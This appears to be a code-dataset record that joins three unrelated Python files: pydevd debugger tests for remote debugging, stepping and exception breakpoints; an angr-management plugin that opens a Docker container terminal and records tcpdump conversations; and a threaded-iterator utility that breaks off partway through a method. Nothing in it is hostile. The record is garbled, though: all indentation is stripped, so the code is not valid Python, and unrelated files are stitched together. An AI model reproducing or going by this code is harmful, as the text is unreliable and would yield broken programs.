@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_remote_debugger_basic(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_remote.py') as writer:
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
writer.log.append('asserting')
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_remote_debugger_threads(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_remote_threads.py') as writer:
writer.write_make_initial_run()
hit_in_main = writer.wait_for_breakpoint_hit()
bp_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(bp_line)
# Break in the 2 threads.
hit_in_thread1 = writer.wait_for_breakpoint_hit(line=bp_line)
hit_in_thread2 = writer.wait_for_breakpoint_hit(line=bp_line)
writer.write_change_variable(hit_in_thread1.thread_id, hit_in_thread1.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_change_variable(hit_in_thread2.thread_id, hit_in_thread2.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_run_thread(hit_in_main.thread_id)
writer.write_run_thread(hit_in_thread1.thread_id)
writer.write_run_thread(hit_in_thread2.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_py_37_breakpoint_remote(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_breakpoint_remote.py') as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
filename='_debugger_case_breakpoint_remote.py',
line=13,
)
writer.write_run_thread(hit.thread_id)
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_py_37_breakpoint_remote_no_import(case_setup_remote):
def get_environ(writer):
env = os.environ.copy()
curr_pythonpath = env.get('PYTHONPATH', '')
pydevd_dirname = os.path.join(
os.path.dirname(writer.get_pydevd_file()),
'pydev_sitecustomize')
curr_pythonpath = pydevd_dirname + os.pathsep + curr_pythonpath
env['PYTHONPATH'] = curr_pythonpath
return env
with case_setup_remote.test_file(
'_debugger_case_breakpoint_remote_no_import.py',
get_environ=get_environ) as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
"108",
filename='_debugger_case_breakpoint_remote_no_import.py',
line=12,
)
writer.write_run_thread(hit.thread_id)
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_remote_debugger_multi_proc(case_setup_remote):
class _SecondaryMultiProcProcessWriterThread(debugger_unittest.AbstractWriterThread):
FORCE_KILL_PROCESS_WHEN_FINISHED_OK = True
def __init__(self, server_socket):
debugger_unittest.AbstractWriterThread.__init__(self)
self.server_socket = server_socket
def run(self):
print('waiting for second process')
self.sock, addr = self.server_socket.accept()
print('accepted second process')
from tests_python.debugger_unittest import ReaderThread
self.reader_thread = ReaderThread(self.sock)
self.reader_thread.start()
self._sequence = -1
# initial command is always the version
self.write_version()
self.log.append('start_socket')
self.write_make_initial_run()
time.sleep(.5)
self.finished_ok = True
def do_kill(writer):
debugger_unittest.AbstractWriterThread.do_kill(writer)
if hasattr(writer, 'secondary_multi_proc_process_writer'):
writer.secondary_multi_proc_process_writer.do_kill()
with case_setup_remote.test_file(
'_debugger_case_remote_1.py',
do_kill=do_kill,
EXPECTED_RETURNCODE='any'
) as writer:
# It seems sometimes it becomes flaky on the ci because the process outlives the writer thread...
# As we're only interested in knowing if a second connection was received, just kill the related
# process.
assert hasattr(writer, 'FORCE_KILL_PROCESS_WHEN_FINISHED_OK')
writer.FORCE_KILL_PROCESS_WHEN_FINISHED_OK = True
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.secondary_multi_proc_process_writer = secondary_multi_proc_process_writer = \
_SecondaryMultiProcProcessWriterThread(writer.server_socket)
secondary_multi_proc_process_writer.start()
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
for _i in xrange(400):
if secondary_multi_proc_process_writer.finished_ok:
break
time.sleep(.1)
else:
writer.log.append('Secondary process not finished ok!')
raise AssertionError('Secondary process not finished ok!')
writer.log.append('Secondary process finished!')
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.parametrize('handle', [True, False])
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_remote_unhandled_exceptions(case_setup_remote, handle):
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
# Don't call super as we have an expected exception
assert 'ValueError: TEST SUCEEDED' in stderr
with case_setup_remote.test_file(
'_debugger_case_remote_unhandled_exceptions.py',
additional_output_checks=additional_output_checks,
check_test_suceeded_msg=check_test_suceeded_msg,
EXPECTED_RETURNCODE=1) as writer:
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
# Add, remove and add back
writer.write_add_exception_breakpoint_with_policy('Exception', '0', '1', '0')
writer.write_remove_exception_breakpoint('Exception')
writer.write_add_exception_breakpoint_with_policy('Exception', '0', '1', '0')
if not handle:
writer.write_remove_exception_breakpoint('Exception')
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
if handle:
writer.log.append('waiting for uncaught exception')
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('finished ok')
writer.finished_ok = True
def test_trace_dispatch_correct(case_setup):
def get_environ(writer):
env = os.environ.copy()
env['PYDEVD_USE_FRAME_EVAL'] = 'NO' # This test checks trace dispatch (so, disable frame eval).
return env
with case_setup.test_file('_debugger_case_trace_dispatch.py', get_environ=get_environ) as writer:
breakpoint_id = writer.write_add_breakpoint(5, 'method')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_PY26, reason='Failing on Python 2.6 on travis (needs investigation).')
def test_case_single_notification_on_step(case_setup):
from tests_python.debugger_unittest import REASON_STEP_INTO
with case_setup.test_file('_debugger_case_import_main.py') as writer:
writer.write_multi_threads_single_notification(True)
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), '')
writer.write_make_initial_run()
hit = writer.wait_for_single_notification_as_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(reason=REASON_STEP_INTO)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(reason=REASON_STEP_INTO)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(reason=REASON_STEP_INTO)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not ok for Jython.')
def test_reload(case_setup, tmpdir):
def additional_output_checks(writer, stdout, stderr):
# Don't call super as we have an expected exception
for line in (
'pydev debugger: Start reloading module: "my_temp2"',
'pydev debugger: Updated function code: <function call',
'pydev debugger: reload finished',
):
if line not in stderr:
raise AssertionError('%s" not in stderr.\nstdout:\n%s\n\nstderr:\n%s' % (
line, stdout, stderr))
path = tmpdir.join('my_temp.py')
path.write('''
import my_temp2
assert my_temp2.call() == 1
a = 10 # break here
assert my_temp2.call() == 2
print('TEST SUCEEDED!')
''')
path2 = tmpdir.join('my_temp2.py')
path2.write('''
def call():
return 1
''')
with case_setup.test_file(str(path), additional_output_checks=additional_output_checks) as writer:
break_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(break_line, '')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
path2 = tmpdir.join('my_temp2.py')
path2.write('''
def call():
return 2
''')
writer.write_reload('my_temp2')
writer.wait_for_message(CMD_RELOAD_CODE)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working with Jython on ci (needs investigation).')
def test_custom_frames(case_setup):
with case_setup.test_file('_debugger_case_custom_frames.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
for i in range(3):
writer.write_step_over(hit.thread_id)
# Check that the frame-related threads have been killed.
for _ in range(i):
writer.wait_for_message(CMD_THREAD_KILL, expect_xml=False)
# Main thread stopped
writer.wait_for_breakpoint_hit(REASON_STEP_OVER)
# At each time we have an additional custom frame (which is shown as if it
# was a thread which is created and then suspended).
for _ in range(i):
writer.wait_for_message(CMD_THREAD_CREATE)
writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
writer.write_run_thread(hit.thread_id)
# Check that the frame-related threads have been killed.
for _ in range(i):
writer.wait_for_message(CMD_THREAD_KILL, expect_xml=False)
writer.finished_ok = True
@pytest.mark.skipif((not (IS_PY36 or IS_PY27)) or IS_JYTHON or IS_PYPY, reason='Gevent only installed on Py36/Py27 for tests.')
def test_gevent(case_setup):
def get_environ(writer):
env = os.environ.copy()
env['GEVENT_SUPPORT'] = 'True'
return env
with case_setup.test_file('_debugger_case_gevent.py', get_environ=get_environ) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
for _i in range(10):
hit = writer.wait_for_breakpoint_hit(name='run')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_return_value(case_setup):
with case_setup.test_file('_debugger_case_return_value.py') as writer:
break_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(break_line, '')
writer.write_show_return_vars()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(name='<module>', line=break_line)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, name='<module>', line=break_line + 1)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<var name="method1" type="int" qualifier="%s" value="int: 1" isRetVal="True"' % (builtin_qualifier,),
'<var name="method1" type="int" value="int%253A 1" isRetVal="True"',
],
])
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, name='<module>', line=break_line + 2)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<var name="method2" type="int" qualifier="%s" value="int: 2" isRetVal="True"' % (builtin_qualifier,),
'<var name="method2" type="int" value="int%253A 2" isRetVal="True"',
],
])
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Jython can only have one thread stopped at each time.')
@pytest.mark.parametrize('check_single_notification', [True, False])
def test_run_pause_all_threads_single_notification(case_setup, check_single_notification):
from tests_python.debugger_unittest import TimeoutError
with case_setup.test_file('_debugger_case_multiple_threads.py') as writer:
# : :type writer: AbstractWriterThread
writer.write_multi_threads_single_notification(True)
writer.write_make_initial_run()
main_thread_id = writer.wait_for_new_thread()
thread_id1 = writer.wait_for_new_thread()
thread_id2 = writer.wait_for_new_thread()
# Ok, all threads created, let's wait for the main thread to get to the join.
writer.wait_for_thread_join(main_thread_id)
writer.write_suspend_thread('*')
if check_single_notification:
dct = writer.wait_for_json_message(CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION)
assert dct['thread_id'] in (thread_id1, thread_id2)
assert dct['stop_reason'] == REASON_THREAD_SUSPEND
else:
# We should have a single thread suspended event for both threads.
hit0 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
assert hit0.thread_id in (thread_id1, thread_id2)
hit1 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
assert hit1.thread_id in (thread_id1, thread_id2)
with pytest.raises(TimeoutError):
# The main thread should not receive a hit as it's effectively deadlocked until other
# threads finish.
writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND, timeout=1)
# Doing a step in in one thread, when paused should notify on both threads.
writer.write_step_over(thread_id1)
if check_single_notification:
dct = writer.wait_for_json_message(CMD_THREAD_RESUME_SINGLE_NOTIFICATION) # Note: prefer wait_for_single_notification_as_hit
assert dct['thread_id'] == thread_id1
dct = writer.wait_for_json_message(CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION) # Note: prefer wait_for_single_notification_as_hit
assert dct['thread_id'] == thread_id1
assert dct['stop_reason'] == REASON_STEP_OVER
hit = writer.get_current_stack_hit(thread_id1)
else:
hit = writer.wait_for_breakpoint_hit(CMD_STEP_OVER)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'stop_loop()')
writer.wait_for_evaluation('<var name="stop_loop()" type="str" qualifier="{0}" value="str: stopped_loop'.format(builtin_qualifier))
writer.write_run_thread('*')
writer.finished_ok = True
def scenario_uncaught(writer):
hit = writer.wait_for_breakpoint_hit()
writer.write_add_exception_breakpoint_with_policy('ValueError', '0', '1', '0')
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
def scenario_caught(writer):
hit = writer.wait_for_breakpoint_hit()
writer.write_add_exception_breakpoint_with_policy('ValueError', '1', '0', '0')
writer.write_run_thread(hit.thread_id)
for _ in range(2):
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
# Note: the one in the top-level will be hit once as caught (but not another time
# in postmortem mode).
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
def scenario_caught_and_uncaught(writer):
hit = writer.wait_for_breakpoint_hit()
writer.write_add_exception_breakpoint_with_policy('ValueError', '1', '1', '0')
writer.write_run_thread(hit.thread_id)
for _ in range(2):
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
# Note: the one in the top-level will be hit once as caught and another in postmortem mode.
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize(
'check_scenario',
[
scenario_uncaught,
scenario_caught,
scenario_caught_and_uncaught,
]
)
def test_top_level_exceptions_on_attach(case_setup_remote, check_scenario):
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
# Don't call super as we have an expected exception
assert 'ValueError: TEST SUCEEDED' in stderr
with case_setup_remote.test_file(
'_debugger_case_remote_unhandled_exceptions2.py',
additional_output_checks=additional_output_checks,
check_test_suceeded_msg=check_test_suceeded_msg,
EXPECTED_RETURNCODE=1) as writer:
writer.log.append('making initial run')
writer.write_make_initial_run()
check_scenario(writer)
writer.log.append('finished ok')
writer.finished_ok = True
@pytest.mark.parametrize('filename, break_at_lines', [
# Known limitation: when it's added to the first line of the module, the
# module becomes traced.
('_debugger_case_tracing.py', {2: 'trace'}),
('_debugger_case_tracing.py', {3: 'frame_eval'}),
('_debugger_case_tracing.py', {4: 'frame_eval'}),
('_debugger_case_tracing.py', {2: 'trace', 4: 'trace'}),
('_debugger_case_tracing.py', {8: 'frame_eval'}),
('_debugger_case_tracing.py', {9: 'frame_eval'}),
('_debugger_case_tracing.py', {10: 'frame_eval'}),
# Note: second frame eval hit is actually a trace because after we
# hit the first frame eval we don't actually stop tracing a given
# frame (known limitation to be fixed in the future).
# -- needs a better test
('_debugger_case_tracing.py', {8: 'frame_eval', 10: 'frame_eval'}),
])
def test_frame_eval_limitations(case_setup, filename, break_at_lines):
'''
Test with limitations to be addressed in the future.
'''
with case_setup.test_file(filename) as writer:
for break_at_line in break_at_lines:
writer.write_add_breakpoint(break_at_line)
writer.log.append('making initial run')
writer.write_make_initial_run()
for break_at_line, break_mode in break_at_lines.items():
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
if IS_PY36_OR_GREATER and TEST_CYTHON:
assert hit.suspend_type == break_mode
else:
# Before 3.6 frame eval is not available.
assert hit.suspend_type == 'trace'
writer.log.append('run thread')
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_step_return_my_code(case_setup):
with case_setup.test_file('my_code/my_code.py') as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback1'
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback2'
writer.write_step_return_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_RETURN_MY_CODE)
assert hit.name == 'callback1'
writer.write_step_return_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_RETURN_MY_CODE)
assert hit.name == '<module>'
writer.write_step_return_my_code(hit.thread_id)
writer.finished_ok = True
def test_step_over_my_code(case_setup):
with case_setup.test_file('my_code/my_code.py') as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback1'
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback2'
writer.write_step_over_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE) # Note: goes from step over to step into
assert hit.name == 'callback1'
writer.write_step_over_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE) # Note: goes from step over to step into
assert hit.name == '<module>'
writer.write_step_over_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_OVER_MY_CODE)
assert hit.name == '<module>'
writer.write_step_over_my_code(hit.thread_id)
writer.finished_ok = True
@pytest.fixture(
params=[
'step_over',
'step_return',
'step_in',
]
)
def step_method(request):
return request.param
def test_sysexit_on_filtered_file(case_setup):
def get_environ(writer):
env = os.environ.copy()
env.update({'PYDEVD_FILTERS': json.dumps({'**/_debugger_case_sysexit.py': True})})
return env
with case_setup.test_file('_debugger_case_sysexit.py', get_environ=get_environ, EXPECTED_RETURNCODE=1) as writer:
writer.write_add_exception_breakpoint_with_policy(
'SystemExit',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=1,
ignore_libraries=0
)
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.parametrize("scenario", [
'handled_once',
'handled_multiple',
'unhandled',
])
def test_exception_not_on_filtered_file(case_setup, scenario):
def get_environ(writer):
env = os.environ.copy()
env.update({'PYDEVD_FILTERS': json.dumps({'**/other.py': True})})
return env
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'raise RuntimeError' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
'my_code/my_code_exception.py',
get_environ=get_environ,
EXPECTED_RETURNCODE='any',
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
) as writer:
if scenario == 'handled_once':
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=2, # Notify only once
notify_on_unhandled_exceptions=0,
ignore_libraries=0
)
elif scenario == 'handled_multiple':
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=0,
ignore_libraries=0
)
elif scenario == 'unhandled':
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=0,
notify_on_unhandled_exceptions=1,
ignore_libraries=0
)
writer.write_make_initial_run()
for _i in range(3 if scenario == 'handled_multiple' else 1):
hit = writer.wait_for_breakpoint_hit(
REASON_UNCAUGHT_EXCEPTION if scenario == 'unhandled' else REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_exception_on_filtered_file(case_setup):
def get_environ(writer):
env = os.environ.copy()
env.update({'PYDEVD_FILTERS': json.dumps({'**/other.py': True})})
return env
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'raise RuntimeError' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
'my_code/my_code_exception_on_other.py',
get_environ=get_environ,
EXPECTED_RETURNCODE='any',
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
) as writer:
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=2, # Notify only once
notify_on_unhandled_exceptions=1,
ignore_libraries=0
)
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.parametrize("environ", [
{'PYDEVD_FILTER_LIBRARIES': '1'}, # Global setting for step over
{'PYDEVD_FILTERS': json.dumps({'**/other.py': True})}, # specify as json
{'PYDEVD_FILTERS': '**/other.py'}, # specify ';' separated list
])
def test_step_over_my_code_global_settings(case_setup, environ, step_method):
def get_environ(writer):
env = os.environ.copy()
env.update(environ)
return env
def do_step():
if step_method == 'step_over':
writer.write_step_over(hit.thread_id)
return REASON_STEP_INTO # Note: goes from step over to step into
elif step_method == 'step_return':
writer.write_step_return(hit.thread_id)
return REASON_STEP_RETURN
else:
assert step_method == 'step_in'
writer.write_step_in(hit.thread_id)
return REASON_STEP_INTO
with case_setup.test_file('my_code/my_code.py', get_environ=get_environ) as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
assert hit.name == 'callback1'
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
assert hit.name == 'callback2'
stop_reason = do_step()
hit = writer.wait_for_breakpoint_hit(reason=stop_reason)
assert hit.name == 'callback1'
stop_reason = do_step()
hit = writer.wait_for_breakpoint_hit(reason=stop_reason)
assert hit.name == '<module>'
if IS_JYTHON:
# Jython may get to exit functions, so, just resume the thread.
writer.write_run_thread(hit.thread_id)
else:
stop_reason = do_step()
if step_method != 'step_return':
stop_reason = do_step()
if step_method == 'step_over':
stop_reason = REASON_STEP_OVER
hit = writer.wait_for_breakpoint_hit(reason=stop_reason)
assert hit.name == '<module>'
writer.write_step_over(hit.thread_id)
writer.finished_ok = True
def test_step_over_my_code_global_setting_and_explicit_include(case_setup):
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
# specify as json (force include).
'PYDEVD_FILTERS': json.dumps({'**/other.py': False})
})
return env
with case_setup.test_file('my_code/my_code.py', get_environ=get_environ) as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
# Although we filtered out non-project files, other.py is explicitly included.
assert hit.name == 'call_me_back1'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_namedtuple(case_setup):
'''
Check that we don't step into <string> in the namedtuple constructor.
'''
with case_setup.test_file('_debugger_case_namedtuple.py') as writer:
line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
expected_line = line
for _ in range(2):
expected_line += 1
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_INTO, file='_debugger_case_namedtuple.py', line=expected_line)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_matplotlib_activation(case_setup):
try:
import matplotlib
except ImportError:
return
def get_environ(writer):
env = os.environ.copy()
env.update({
'IPYTHONENABLE': 'True',
})
return env
with case_setup.test_file('_debugger_case_matplotlib.py', get_environ=get_environ) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
for _ in range(3):
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
# Jython needs some vars to be set locally.
# set JAVA_HOME=c:\bin\jdk1.8.0_172
# set PATH=%PATH%;C:\bin\jython2.7.0\bin
# set PATH=%PATH%;%JAVA_HOME%\bin
# c:\bin\jython2.7.0\bin\jython.exe -m py.test tests_python
if __name__ == '__main__':
pytest.main(['-k', 'test_unhandled_exceptions_in_top_level2'])
|
interaction_console.py
|
import threading
import archr
from PySide2.QtWidgets import QMainWindow, QMessageBox, QVBoxLayout
from PySide2.QtCore import Qt
from qtterm import TerminalWidget
from angrmanagement.plugins import BasePlugin
from angrmanagement.ui.views import BaseView
from angrmanagement.ui.views.interaction_view import (
SavedInteraction,
PlainTextProtocol,
)
class ConsoleView(BaseView):
"""
ConsoleView
"""
def __init__(self, target, *args, **kwargs):
self.target = target
super().__init__("interaction console", *args, **kwargs)
self.base_caption = "Interaction Console"
main_layout = QVBoxLayout()
main = QMainWindow()
terminal = TerminalWidget(
command=[
"docker",
"exec",
"-it",
self.target.companion_container.id,
"bash",
]
)
main.setWindowFlags(Qt.Widget)
main.setCentralWidget(terminal)
main_layout.addWidget(main)
self.setLayout(main_layout)
class InteractionConsole(BasePlugin):
"""
InteractionConsole Plugin
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.target = None
self.conversations = {}
img_name = self.workspace.instance.img_name
if img_name is None:
QMessageBox.critical(
None, "Nothing to run", "The project was not loaded from a docker image"
)
return
self.target = archr.targets.DockerImageTarget(img_name, companion=True)
self.target.build().start()
self.analyzer = archr.analyzers.TCPDumpAnalyzer(self.target)
self.interaction_context = self.analyzer.fire_context(timeout_exception=False)
self.interaction_context.__enter__()
threading.Thread(target=self._inotify_thread, daemon=True).start()
self.workspace.extract_conversations = self.analyzer.extract_conversations
self.console_view = ConsoleView(self.target, self.workspace, "center")
self.workspace.default_tabs += [self.console_view]
self.workspace.add_view(
self.console_view,
self.console_view.caption,
self.console_view.category,
)
def teardown(self):
if self.target:
self.target.__exit__()
def _inotify_thread(self):
inotify = self.target.run_companion_command(
[
"inotifywait",
"--monitor",
"--event",
"modify",
archr.analyzers.TCPDumpAnalyzer.pcap_path,
]
)
while True:
inotify.stdout.read(0x1000)
conversations = self.analyzer.extract_conversations()
for id_, conversation in conversations.items():
if id_ not in self.conversations:
self._save_interaction(conversation)
self.conversations = conversations
def _save_interaction(self, conversation):
target_port = self.target.tcp_ports[0]
def direction(srcport, dstport):
if srcport == target_port:
return "out"
if dstport == target_port:
return "in"
raise Exception("Unknown direction")
log = [
{
"dir": direction(srcport, dstport),
"data": payload,
}
for (srcport, dstport, payload) in conversation
]
name = hex(hash(str(conversation)) & 0xFFFFFFFFFFFFFFFF)[2:].rjust(16, "0")
self.workspace.instance.interactions.am_obj.append(
SavedInteraction(name, PlainTextProtocol, log)
)
self.workspace.instance.interactions.am_event()
|
iterators.py
|
import multiprocessing
import sys
import queue
import threading
import traceback
from typing import TypeVar, Iterable, Iterator, List, Callable
T = TypeVar('T')
__all__ = ['ThreadedIterator', 'MultiWorkerCallableIterator', 'BufferedIterator', 'DoubleBufferedIterator']
class ThreadedIterator(Iterator[T]):
"""An iterator object that computes its elements in a single parallel thread to be ready to be consumed.
The iterator should *not* return `None`. Elements of the original iterable will be shuffled arbitrarily."""
def __init__(self, original_iterator: Iterator[T], max_queue_size: int=2, enabled: bool=True):
self.__is_enabled = enabled
if enabled:
self.__queue = queue.Queue(maxsize=max_queue_size)
self.__thread = threading.Thread(target=lambda: self.__worker(self.__queue, original_iterator))
self.__thread.start()
else:
self.__original_iterator = original_iterator
@staticmethod
def __worker(queue: queue.Queue, original_iterator: Iterator[T])-> None:
try:
for element in original_iterator:
assert element is not None, 'By convention, Iterables wrapped in ThreadedIterator may not contain None.'
queue.put(element, block=True)
queue.put(None, block=True)
except Exception as e:
_, __, tb = sys.exc_info()
queue.put((e, tb), block=True)
def __next__(self) -> T:
next_element = self.__queue.get(block=True)
if next_element is None:
self.__thread.join()
